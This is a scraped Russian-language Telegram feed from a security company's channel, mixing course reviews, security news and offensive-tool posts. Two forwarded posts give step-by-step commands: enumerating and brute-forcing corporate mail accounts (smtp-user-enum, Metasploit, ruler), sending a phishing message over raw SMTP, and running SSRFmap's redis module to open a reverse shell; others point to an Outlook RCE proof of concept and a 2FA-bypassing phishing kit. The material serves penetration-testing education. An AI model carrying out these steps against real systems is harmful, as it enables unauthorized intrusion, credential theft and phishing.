AP Security
3.45K subscribers
277 photos
2 videos
61 files
527 links
Лаборатория инновационных технологий и кибербезопасности. ( Laboratory of innovation technologies and cybersecurity )
Новости, события, мероприятия, технические обзоры

По вопросам сотрудничества:
@P1N_C0DE
Download Telegram
Latest_SOC_Analyst_L1_Interview_Questions__1719796381-1.pdf
220.8 KB
#soc #beginners

👋 Интервью SOC L1

Путь специалиста по информационной безопасности насыщен и разнообразен.

🔵В приведённом файле обозначены вопросы с интервью на позиции аналитика.

Успехов в начинаниях👍
Please open Telegram to view this post
VIEW IN TELEGRAM
54🆒43
#byapsecurity

🌟Мнение пентестера AP Security об обучении на отечественных курсах.

Вот и подошёл к концу увлекательный путь прохождения курса «Анализ защищенности инфраструктуры на основе технологий Active Directory» от RalfHacker (Автор известной книги "Active Directory глазами хакера") и Павла Никитина. Мы учились первым потоком и отработали всё на твёрдую пятёрку.

В нашей компании есть хорошая практика регулярно повышать свою квалификацию, а в связи с уходом многих зарубежных сертификаций с рынка отличной возможностью стало попробовать отечественные наработки. К тому же я давно пытался освоить тему внутреннего пентеста прочтениями разных циклов статей, например от zer1to , прохождением лабораторных по типу GOAD. Но это большого успеха не приносило, это всё не структурировано, нет отработки большинства тем на практике, нет передачи накопленного опыта на реальных практических кейсах и учениях.

Реальное понимание и подход к похеку внутрянки я приобрёл за эти 3 месяца. После прохождения курса у меня появилась отличная база заметок по каждой тактике и технике, применяемой на пентесте, не удивительно, к каждому уроку были подготовлены методички ( примерно 30 страниц на каждом уроке ), видео прохождения лабораторной на отработку всех техник и Домашнее задание, на решение которого уходило 2-3 вечера после работы. К тому же появилась целая заметка тем, которые дополнительно стоит изучить, так сказать down the rabbit hole. Я справлялся почти всегда в сроки, в общей сложности я сделал 16 домашних заданий и сдал экзамен без больших трудностей, учитывая, что раньше я только несколько работал с атаками на домен во время пентестов, в основном я ломал веб, занимался разработкой и был уверенным игроком в ctf.

Крутым моментом стало освещение огромного количества утилит под различные платформы, теперь я точно не растеряюсь, если мне нужно будет релеить хеши на виндовом хосте. Огромное количество методов повышения привилегий , сбора УД, закрепления, туннелирование, обходов UAC, AMSI, ретрансляционные атаки, атаки на доверительные отношения, службы сертификации, делегирование, работа с C2 и это не весь список тем с которыми вам придётся столкнуться.

Подводя итог, хочется сказать только одно - огромное спасибо Мише и Паше за Лучший курс по внутрянке в стране, а может быть и в мире(кто знает..)
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥1198👏2😴2
#byapsecurity

🔥 Наверняка уже не раз Вы встречались с работами нашего исследователя безопасности.

AFANX, автор статей на Хакер "Беззащитная защита. Изучаем уязвимость, дающую встроить бэкдор в FortiGate", "Гид по реверсу.Тренируемся анализировать бинарные файлы на примере libexif" и далеко не только этих работ, по истине энтузиаст и специалист своего дела завёл свой канал-блог, где делится отличительной атмосферой и собственными работами.

📲Подписывайтесь на канал и прокачивайте свои навыки в области реверса и pwn.💡
Please open Telegram to view this post
VIEW IN TELEGRAM
653🆒2
Forwarded from Machete Hack
Атакуем корпоративную почту ☄️

Часто при пентесте возникает ситуация, когда при скане портов можно наткнуться на открытый 25 порт, на котором висит SMTP сервер, но что же можно с этим поделать?

Самым первым действием можно попробовать просто подключиться к самому серверу
nc -vn ip 25

В данном случае уже можно получить баннер SMTP сервера и поискать готовые сплойты

Бывали случаи, когда SMTP сервер не требовал аутентификации и позволял отправлять почтовые письма от любого юзера другому любому юзеру, что будет отличным началом для последующего фишинга. Но что делать, если на этапе разведки нам не удалось получить достаточное количество корпоративных емэйлов сотрудников?

Тут нам поможет user enumeration(брут учеток), который можно сделать через готовую утилиту smtp-user-enum, написанную на питоне
pip install smtp-user-enum


Утилита имеет несколько режимов, которые используются при неудачной отработке других

VRFY mode(default)
smtp-user-enum -U /usr/share/wordlists/users.txt mail.example.tld 25


EXPN mode
smtp-user-enum -m EXPN -U /usr/share/wordlists/users.txt mail.example.tld 25


RCPT mode
smtp-user-enum -m RCPT -U /usr/share/wordlists/users.txt mail.example.tld 25


Также существует готовый модуль в metasploit для перебора пользователей на smtp сервере
msf > use auxiliary/scanner/smtp/smtp_enum 
msf auxiliary(smtp_enum) set RHOSTS <IP address/target>
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) set USER_FILE <address of file>
msf auxiliary(smtp_enum) run


После того как мы нашли валидные мэйлы уже можно отправлять сообщения
MAIL FROM: [email protected]
250 ok
RCPT TO: [email protected]
250 ok
data
354 End data with <CR><LF>.<CR><LF>
SUBJECT: Тема письма
фишинговый текст
. (ставится с новой строки, чтобы закончить текст письма)
250 ok


В контексте темы поста рассмотрим ситуацию, когда мы натыкаемся на Microsoft Exchange Server, а именно на Outlook Web Access, веб-интерфейс, предоставляющий пользователю возможность отправлять сообщения, добавлять контакты, вести календарь и планы.

Для поиска эксплойтов можно узнать версию OWA следующим скриптом
sudo python3 get_exchange_version.py https://mail.target.com



В отстутствии списка валидных почт, можно воспользоваться Time Based брутфорсом, который иногда срабатывает. Для этого запустим Intruder в Burp Suite, подготовим словарь и начнем перебирать пользователей. После выполнения Sniper атаки(Режим работы Intruder) отфильтруем запросы по времени и увидим, что у валидных пользователей время обработки запроса будет в разы больше.

Можно воспользоваться одними из самых популярных CVE для OWA
ProxyLogon
ProxyShell

Для уже найденных пользователей можно сбрутить пароль также через Intruder, либо через инструмент ruler
wget https://github.com/sensepost/ruler/releases/download/2.4.1/ruler-linux64
chmod +x ruler-linux64

./ruler-linux64 --domain domain.com brute --users usernames.txt --passwords passwords.txt


После успешной аутентификации можно не только отправлять письма, либо читать переписки, но и собрать весьма полезную информацию из календаря, либо cписок контаков GAL(Global Address List)

Для автоматизации сбора глобального списка адресов можем опять использовать ruler
./ruler-linux64 --email [email protected] abk dump --output /tmp/gal.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
8❤‍🔥75
#pentest

📱System32 для выполнения атак.

Каталог System32 - это критический компонент операционной системы Windows, в котором хранятся важные системные файлы и библиотеки, необходимые для работы системы.

В контексте наступательной безопасности этот каталог имеет большое значение, поскольку содержит исполняемые файлы и сценарии, которые можно использовать как для администрирования системы, так и для вредоносных целей.

Приятного прочтения 👌
Please open Telegram to view this post
VIEW IN TELEGRAM
54🆒3💔2
#soc

✏️ VasyGrek and Mr.Burns

Как выяснили в F.A.C.C.T., атакующая российские компании группировка VasyGrek активна как минимум с 2016 года. В погоне за бизнес-аккаунтами ДБО злоумышленники используют коммерческих инфостилеров и RAT, в том числе творения вирусописателя Mr.Burns.

Эксперты F.A.C.C.T проанализировали инструменты и связи киберпреступников, атакующих российских бухгалтеров.

Приятного прочтения👁
Please open Telegram to view this post
VIEW IN TELEGRAM
7🆒44
#tools #redteam

🎨 ProtectMyTooling

Скрипт
, который объединяет множество упаковщиков, обфускаторов, загрузчиков шеллкода, кодировщиков для создания сложных защищенных имплантатов Red Team. Ваш идеальный компаньон в CI/CD конвейере разработки ПО, помогающий ставить водяные знаки на ваши артефакты, собирать IOC и многое другое.
Please open Telegram to view this post
VIEW IN TELEGRAM
65❤‍🔥4
#realcase

🖥 Что должно измениться, чтобы утечек стало меньше

Ассоциация больших данных (ее членами являются «Яндекс», VK, Сбербанк, Газпромбанк, Тинькофф Банк, Россельхозбанк, «Мегафон», «Ростелеком», Qiwi, билайн, МТС, фонд «Сколково», Аналитический центр при правительстве Российской Федерации, ВТБ, Avito, Центр стратегических разработок) предложила депутатам уточнить текст поправок в Уголовный кодекс, ужесточающих наказание за утечки данных и устанавливающих для нарушителей даже уголовную ответственность за сбор или хранение незаконно полученных персональных данных. Об этом говорится в письме ассоциации от 26 декабря 2023 года в комитет Госдумы по госстроительству и законодательству.

🔩 Данная дискуссия широко описывает проблемы регулирования ответственности за утечки персональных данных, от рисков для бизнеса до юридических ограничений. Обсуждается предложенный АБД стандарт в области защиты персональных данных, опробованный крупными игроками рынка.

Приятного просмотра 🌟
Please open Telegram to view this post
VIEW IN TELEGRAM
65🆒3
#byapsecurity

🐦 Студенческий опыт Standoff — на шаг ближе к вершинам 🥇

Привет!!! Не так давно стажёры лаборатории инновационных технологий и кибербезопасности нашей компании принимали участие во Всероссийской студенческой кибербитве. Изюминкой тех соревнований являлся полигон Standoff, предоставленный студентам для получения первичных навыков участия в этих захватывающих кибербитвах.

⚡️ 8-10 сентября эти захватывающие соревнования пройдут вновь. Вся информация представлена по ссылке.

Надеемся, что печатный труд ребят ( за что им отдельная благодарность) поможет Вам раскрыть потенциал и реализовать свои цели - принять участие в сражениях Государства F в роли атакующих или защитников🔥

Приятного прочтения ✈️
Please open Telegram to view this post
VIEW IN TELEGRAM
6🆒551
#osint

🔍Удивительный OSINT

Этот насыщенный список инструментов создан помочь всем, кто занимается Cyber Threat Intellience (CTI), охотой за угрозами или осинтом. Ресурс полезен от начинающих специалистов до продвинутых.
Please open Telegram to view this post
VIEW IN TELEGRAM
55🆒4
#pentest

📱 PoC Microsoft Outlook Remote Code Execution CVE-2024-21413

13 февраля 2024 года компания Microsoft выпустила предупреждение для своих пользователей о критической уязвимости в пакете Office, которая позволяет злоумышленникам удаленно выполнять вредоносный код.

Уязвимость затрагивает несколько продуктов Microsoft Office, включая приложения 365 Enterprise, Office 2016 и 2019, а также Office LTSC 2021.

➡️ PoC на данную уязвимость: https://blog.injectexp.dev/outlook-cve-2024-21413-for-rce-hacking-through-a-letter/07/rce/

В строке 27 необходимо указать путь к файлу на вашем сервере. В описании к скрипту имеются комментарии.

Об уязвимости: https://habr.com/ru/articles/798759/
Please open Telegram to view this post
VIEW IN TELEGRAM
533🆒3👎1😴1😎1
#pentest #redteam

⬇️ Фишинговая платформа EvilnoVNC

Наверняка не раз Вы слышали об опыте использования опенсорсного продукта Gophish. В дополнение к этому базовому инструменту прикладываем EvilnoVNC.

EvilnoVNC - это готовая к работе фишинговая платформа.

В отличие от других фишинговых технологий, EvilnoVNC позволяет обойти 2FA, используя реальный браузер через noVNC-соединение.

Кроме того, этот инструмент позволяет в режиме реального времени видеть все действия жертвы, осуществлять доступ к загруженным файлам и изучать весь профиль браузера, включая куки, сохраненные пароли, историю просмотров и многое другое.

🔔 Также прикладываем свежий обзор на существующие утилиты для осуществления фишинговой рассылки в рамках Ваших проектов по аудиту безопасности.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥55🆒3🤔2😴1
📱 Кто стучится в почту? Social engineering 2024

PDF или SVG smuggling, PDF polyglot, PDF luring в докладе Константина Полишина об актуальных методах проведения фишинга в рамках Red team проектов являются дополнением к материалам PHD12.

С первой частью составного доклада по этой теме можно ознакомиться по следующей ссылке. В прошлогоднем выпуске PT также расписан материал первой части.

Приятного просмотра🌟
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥6🆒44
🎙 До начала торжественной церемонии остаётся 9 часов

Именно сегодня, в 19:00 ⚡️ , стартует трансляция награждения участников премии Pentest Award.

В этом году лаборатория инновационных технологий и кибербезопасности компании AP Security принимала участие в нескольких номинациях.

Данное мероприятие является праздником для энтузиастов информационной безопасности и позволяет раскрыть в себе творческий и профессиональный потенциал, оценить свои силы, познакомиться с единомышленниками и вдохновиться на что-то новое и интересное.

Мы также в онлайне будем радоваться успехам всех финалистов данной премии и поздравлять своих коллег с попадаем на торжественную церемонию.

🐦 Всем желаем интересных проектов, вдохновения и удачи во всём, к чему лежит душа и делает мир кибербезопаности более насыщенным и интересным!
Please open Telegram to view this post
VIEW IN TELEGRAM
10❤‍🔥7🆒4
#infosec

🐶 Новый PyPI-пакет Zlibxjson крадет данные Discord и браузеров

Вредоносный пакет под названием zlibxjson версии 8.2 был отмечен системой обнаружения вредоносного ПО, управляемой искусственным интеллектом компании Fortinet.

Было замечено, что пакет тайно загружает несколько файлов, включая исполняемый файл (.exe) с пакетом PyInstaller, который при распаковке содержит несколько файлов Python и DLL.

Среди них особенно опасными оказались три Python-скрипта - Discord_token_grabber.py, get_cookies.py и password_grabber.py.


📱 Windows-версия WhatsApp позволяет запускать Python и PHP без предупреждения

Проблема в безопасности последней версии WhatsApp (принадлежит компании Meta, признанной экстремистской и запрещенной в России) для Windows позволяет отправлять Python- и PHP-вложения, которые будут выполняться на устройстве пользователя без каких-либо предупреждений.

Для успешной эксплуатации этого бага в системе жертвы должен быть установлен Python. Это условие может сузить список потенциальных жертв до разработчиков софта.

🔔 Власти Израиля изъяли документы и компьютеры у создателей шпионской программы Pegasus, чтобы они не попали в США

Утечка из Министерства юстиции Израиля указывает на то, что правительство страны изъяло документы и компьютеры у компании NSO Group, чтобы предотвратить передачу потенциально компрометирующих материалов в рамках судебного процесса в США. Об этом в конце июля 2024 г. сообщило The Guardian.

По информации The Guardian, ставки запредельно высоки, поскольку судебное разбирательство может раскрыть исключительно секретную информацию, касающуюся шпионского программного обеспечения (ПО) под названием Pegasus, одного из самых известных хакерских инструментов в мире.
Please open Telegram to view this post
VIEW IN TELEGRAM
6🆒4❤‍🔥3
Forwarded from Machete Hack
Автоматизация с помощью SSRFmap 👁‍🗨

Проверенный временем, инструмент для автоматизации SSRF атак, поддерживающий большое количество модулей, кодирование нагрузки для bypass'а WAF'ов, создание reverse shell соединения

☄️ https://github.com/swisskyrepo/SSRFmap ☄️

Ставим на хост
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py


Поднимаем докер
git clone https://github.com/swisskyrepo/SSRFmap
docker build --no-cache -t ssrfmap .
docker run -it ssrfmap ssrfmap.py [OPTIONS]
docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py


Пример команды, где опция -r —> запрос, сохраненный из Burp Suite, -p —> тестируемый параметр, -m —> используемые модули
python ssrfmap.py -r request.txt -p url -m readfiles,portscan


Используем модуль redis, который сразу пробует проэксплуатировать RCE, где параметры LHOST и LPORT служат для создания reverse shell
python ssrfmap.py -r request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242


И в конце небольшой Cheat Sheet по SSRF 💫
Please open Telegram to view this post
VIEW IN TELEGRAM
54❤‍🔥3🆒2
Forwarded from K0N70R4
Теперь о текущем
Делаюсь своим опытом и скиллом написания скриптов для gdb
Признаюсь,братцы,вам: gdb это не страшная бабка из астрала, а очень добрый друг Каспер, который может облегчить вам жизнь
Ни раз сталкивался с тем, что нужно было что-то автоматизировать в отладчиках, работая с фаззерами
Поэтому берите и юзайте
Встречайте первую статью - Признаюсь, братцы, вам гдбшку я любил GDB Scripting Linux and Windows